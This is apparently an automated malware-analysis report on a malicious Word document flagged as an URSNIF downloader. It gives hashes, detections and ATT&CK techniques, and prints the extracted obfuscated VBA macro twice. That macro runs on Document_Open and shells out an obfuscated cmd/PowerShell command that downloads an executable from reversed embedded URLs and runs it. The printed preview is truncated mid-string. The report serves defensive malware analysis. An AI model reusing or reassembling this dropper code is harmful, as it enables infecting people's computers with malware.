Office (OLE) malware analysis — malicious · 8d9d8a02cde1b17c

MALICIOUS

Office (OLE)

78.6 KB Created: 2018-09-11 07:29:00 Authoring application: Microsoft Office Word First seen: 2019-05-31

MD5: 4caf8f1ba3c456ab5398053dca7d5132 SHA-1: 714cf6d58bff617565c959c4e02eed6ca50de3d0 SHA-256: 8d9d8a02cde1b17cd2e12f2d05965ec7a199be31d1eb3cade00f8e595a6b9ac0

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' indicates the use of the Shell() function, which is likely used to download and execute a second-stage payload. The ClamAV detection 'Doc.Downloader.URSNIF-6729855-3' further supports its nature as a downloader. The Document_Open macro is present, suggesting execution upon opening.

Heuristics 5

ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5965 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5965 bytes
SHA-256: `beff985b561899a19a4c4cacbecd59c3cfad09dfcb58564d2cc9d442a41f7f41`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "kSLIGIsczOKY" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On _ Error _ Resume _ Next VarType "GLnEwoBQ" + "FDd" VarType "7459" + "CS" VarType "9396" + "ljKtaTs" Shell qihRl + dKwfailFO + iOFAC, Format(vbHide) VarType "nXCzk" + "bkE" + "8768" + "h" VarType "O" + "PXuTkj" VarType "vMqv" + "NlFY" End Sub Attribute VB_Name = "XiAiSwmSNXGLav" Function qihRl() On _ Error _ Resume _ Next VarType "SQsTMXVI" + "FJViTaWKUA" wToqUwXF = Format(Chr(4 + 3 + 7 + 9 + 76)) + "md /V/" + Format(Chr(3 + 2 + 4 + 6 + 52)) + Format(Chr(1 + 1 + 2 + 2 + 28)) + "s^" + "e^t" + " 9" + "^E" + "^F=" + " ^" + " ^ ^ " + " ^ ^" + " ^ ^ ^ " + " ^" + " }}^" VarType "1931" + "htsPqjrl" + "Kl" + "pu" VarType "ita" + "3846" + "TIK" + "r" VarType "PZTiLqOLQW" + "1201" VarType "225042615" + "215436024" VarType "hXBEIWVBYv" + "dttpJS" + "tswzLwd" + "390060590" vVGffBq = "{h" + Format(Chr(4 + 3 + 7 + 9 + 76)) + "^" + "ta" + Format(Chr(4 + 3 + 7 + 9 + 76)) + "^}" + "^;k^a^e" + "rb;^w^H" + "Y^$^ ^" + "metI" VarType "ANDEDtAdt" + "147501874" + "IDwFJhJGM" + "jEVidz" VarType "joIjfrt" + "H" + "zjREwi" + "1255" VarType "w" + "376284110" + "jl" + "zslzmjhME" VarType "7104" + "UtoF" + "MEOV" + "392641116" CpvkvSbirwm = "-" + "^" + "e" + "k" + "^ovn^I" + "^;)^wHY" + "$^ ^,^z" + "^Fp^" + "$(eli" + "F^da" + "o^" VarType "zJD" + "4952" VarType "7633" + "2910" + "t" + "4245" VarType "fCw" + "tDjtWjvrSLSvrY" FzQlWFja = "lnw^" + "o^D^.M" + "^z" + "V^${^" + "yr^t" + "{)^b" + "^Pv^$^" + " n" + "^i z" + "F" + "^p$" VarType "BMQdrrZ" + "jq" VarType "v" + "h" + "zwiG" + "lZTGokw" VarType "bXNVUMopSnBln" + "39566145" VarType "huJW" + "AfVr" + "wmps" + "432950653" VcBmj = "(^h" + Format(Chr(4 + 3 + 7 + 9 + 76)) + "a^e" + "r^o" + "f;^" + "'^e" VarType "ImvjYNN" + "kbS" + "9215" + "FT" iwdsGZiwWP = "^xe^.'" + "+^f" + "v" + "^f$+'^" + "\^" + "'+" + Format(Chr(4 + 3 + 7 + 9 + 76)) + "i" + "l" + "^bu" qihRl = wToqUwXF + vVGffBq + CpvkvSbirwm + FzQlWFja + VcBmj + iwdsGZiwWP VarType "uhrV" + "aYOCBBHji" VarType "266007100" + "522221226" VarType "E" + "341595841" + "frU" + "a" End Function Function dKwfailFO() On _ Error _ Resume _ Next VarType "wJmYVHh" + "uPPL" VarType "RV" + "58595992" ddapZwIfbt = "p" + ":vn^e$" + "^" + "=^wH" + "Y$;" + "'^8" + "^84^'" VarType "223830230" + "103014036" + "485438920" + "Ew" VarType "BmYR" + "iHE" + "257315928" + "fpa" EKMsIMKU = "^ = fv" + "^f^$^" + ";)^'" + "@'(^" + "ti" + "l^" + "p^S.'^B" + "^" + "w^" + "e" + "^oLZ3^" + "x/" + "^tp" VarType "E" + "389342528" + "XwMEjjGFO" + "XLQ" VarType "20465688" + "363997024" + "1087" + "fAwiwq" VarType "3924" + "llzp" + "343673353" + "N" VarType "TUCqNa" + "Mo" + "493653995" + "32912953" wbDzNzCR = ".^sg^o" + "^du^a^" + "im//^" + ":ptth^" + "@1A^" + "6^09R" + "^" + "1/" + "^mo" + Format(Chr(4 + 3 + 7 + 9 + 76)) + "^.s^e^" + "l" VarType "5131" + "rtiGT" cwoXZGC = "a" + "st^a^" + "o^b^en^" + "i^lr^" + "ev^l^i" + "s//^" + ":^p" + "t^t^h@" VarType "tjzM" + "106513604" + "119746850" + "uD" VarType "9619" + "f" + "iKvV" + "j" VarType "wGZzYZUts" + "250332771" VarType "3440" + "wXpl" Cwibs = "^F" + "/a^" + "u^.mo" + Format(Chr(4 + 3 + 7 + 9 + 76)) + ".t^s" + "^" VarType "290631908" + "vJtQ" VarType "HZmFOkIM" + "ElG" VarType "4554" + "3969" RSpjBtzsKSi = "on^g^a^" + "i" + "d" + "-otu^a/" + "/^:" + "p^tth^@" + "r^bty" + "J^d^" VarType "zvqSTVJc" + "7338" + "uArnwhwztbnG" + "uYEHb" VarType "507436645" + "UwQzni" VarType "9426" + "58389559" VarType "mMmwCzjj" + "wulSpQ" lphNEl = "Y/" + "l^p^." + "^s^s" + "^e" + "^" + "y//" + "^" + ":^ptt" + "^h" + "@n^" + "w^" + "K0nW/^m" VarType "8093" + "304564285" + "1137" + "4760" VarType "lDz" + "fmU" + "6254" + "RnaHmjpKwEVpX" mfXucZW = " ... (truncated)

SHA-256: beff985b561899a19a4c4cacbecd59c3cfad09dfcb58564d2cc9d442a41f7f41

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "kSLIGIsczOKY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   VarType "GLnEwoBQ" + "FDd"
   VarType "7459" + "CS"
   VarType "9396" + "ljKtaTs"
Shell qihRl + dKwfailFO + iOFAC, Format(vbHide)
   VarType "nXCzk" + "bkE" + "8768" + "h"
   VarType "O" + "PXuTkj"
   VarType "vMqv" + "NlFY"
End Sub



Attribute VB_Name = "XiAiSwmSNXGLav"
Function qihRl()

On _
Error _
Resume _
Next
VarType "SQsTMXVI" + "FJViTaWKUA"
wToqUwXF = Format(Chr(4 + 3 + 7 + 9 + 76)) + "md /V/" + Format(Chr(3 + 2 + 4 + 6 + 52)) + Format(Chr(1 + 1 + 2 + 2 + 28)) + "s^" + "e^t" + " 9" + "^E" + "^F=" + " ^" + "  ^ ^ " + "    ^ ^" + " ^ ^ ^ " + "  ^" + " }}^"
VarType "1931" + "htsPqjrl" + "Kl" + "pu"
   VarType "ita" + "3846" + "TIK" + "r"
   VarType "PZTiLqOLQW" + "1201"
   VarType "225042615" + "215436024"
   VarType "hXBEIWVBYv" + "dttpJS" + "tswzLwd" + "390060590"
vVGffBq = "{h" + Format(Chr(4 + 3 + 7 + 9 + 76)) + "^" + "ta" + Format(Chr(4 + 3 + 7 + 9 + 76)) + "^}" + "^;k^a^e" + "rb;^w^H" + "Y^$^ ^" + "metI"
VarType "ANDEDtAdt" + "147501874" + "IDwFJhJGM" + "jEVidz"
   VarType "joIjfrt" + "H" + "zjREwi" + "1255"
   VarType "w" + "376284110" + "jl" + "zslzmjhME"
   VarType "7104" + "UtoF" + "MEOV" + "392641116"
CpvkvSbirwm = "-" + "^" + "e" + "k" + "^ovn^I" + "^;)^wHY" + "$^ ^,^z" + "^Fp^" + "$(eli" + "F^da" + "o^"
VarType "zJD" + "4952"
   VarType "7633" + "2910" + "t" + "4245"
   VarType "fCw" + "tDjtWjvrSLSvrY"
FzQlWFja = "lnw^" + "o^D^.M" + "^z" + "V^${^" + "yr^t" + "{)^b" + "^Pv^$^" + " n" + "^i z" + "F" + "^p$"
VarType "BMQdrrZ" + "jq"
   VarType "v" + "h" + "zwiG" + "lZTGokw"
   VarType "bXNVUMopSnBln" + "39566145"
   VarType "huJW" + "AfVr" + "wmps" + "432950653"
VcBmj = "(^h" + Format(Chr(4 + 3 + 7 + 9 + 76)) + "a^e" + "r^o" + "f;^" + "'^e"
VarType "ImvjYNN" + "kbS" + "9215" + "FT"
iwdsGZiwWP = "^xe^.'" + "+^f" + "v" + "^f$+'^" + "\^" + "'+" + Format(Chr(4 + 3 + 7 + 9 + 76)) + "i" + "l" + "^bu"
qihRl = wToqUwXF + vVGffBq + CpvkvSbirwm + FzQlWFja + VcBmj + iwdsGZiwWP
   VarType "uhrV" + "aYOCBBHji"
   VarType "266007100" + "522221226"
   VarType "E" + "341595841" + "frU" + "a"
End Function
Function dKwfailFO()

On _
Error _
Resume _
Next
VarType "wJmYVHh" + "uPPL"
   VarType "RV" + "58595992"
ddapZwIfbt = "p" + ":vn^e$" + "^" + "=^wH" + "Y$;" + "'^8" + "^84^'"
VarType "223830230" + "103014036" + "485438920" + "Ew"
   VarType "BmYR" + "iHE" + "257315928" + "fpa"
EKMsIMKU = "^ = fv" + "^f^$^" + ";)^'" + "@'(^" + "ti" + "l^" + "p^S.'^B" + "^" + "w^" + "e" + "^oLZ3^" + "x/" + "^tp"
VarType "E" + "389342528" + "XwMEjjGFO" + "XLQ"
   VarType "20465688" + "363997024" + "1087" + "fAwiwq"
   VarType "3924" + "llzp" + "343673353" + "N"
   VarType "TUCqNa" + "Mo" + "493653995" + "32912953"
wbDzNzCR = ".^sg^o" + "^du^a^" + "im//^" + ":ptth^" + "@1A^" + "6^09R" + "^" + "1/" + "^mo" + Format(Chr(4 + 3 + 7 + 9 + 76)) + "^.s^e^" + "l"
VarType "5131" + "rtiGT"
cwoXZGC = "a" + "st^a^" + "o^b^en^" + "i^lr^" + "ev^l^i" + "s//^" + ":^p" + "t^t^h@"
VarType "tjzM" + "106513604" + "119746850" + "uD"
   VarType "9619" + "f" + "iKvV" + "j"
   VarType "wGZzYZUts" + "250332771"
   VarType "3440" + "wXpl"
Cwibs = "^F" + "/a^" + "u^.mo" + Format(Chr(4 + 3 + 7 + 9 + 76)) + ".t^s" + "^"
VarType "290631908" + "vJtQ"
   VarType "HZmFOkIM" + "ElG"
   VarType "4554" + "3969"
RSpjBtzsKSi = "on^g^a^" + "i" + "d" + "-otu^a/" + "/^:" + "p^tth^@" + "r^bty" + "J^d^"
VarType "zvqSTVJc" + "7338" + "uArnwhwztbnG" + "uYEHb"
   VarType "507436645" + "UwQzni"
   VarType "9426" + "58389559"
   VarType "mMmwCzjj" + "wulSpQ"
lphNEl = "Y/" + "l^p^." + "^s^s" + "^e" + "^" + "y//" + "^" + ":^ptt" + "^h" + "@n^" + "w^" + "K0nW/^m"
VarType "8093" + "304564285" + "1137" + "4760"
   VarType "lDz" + "fmU" + "6254" + "RnaHmjpKwEVpX"
mfXucZW = "
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.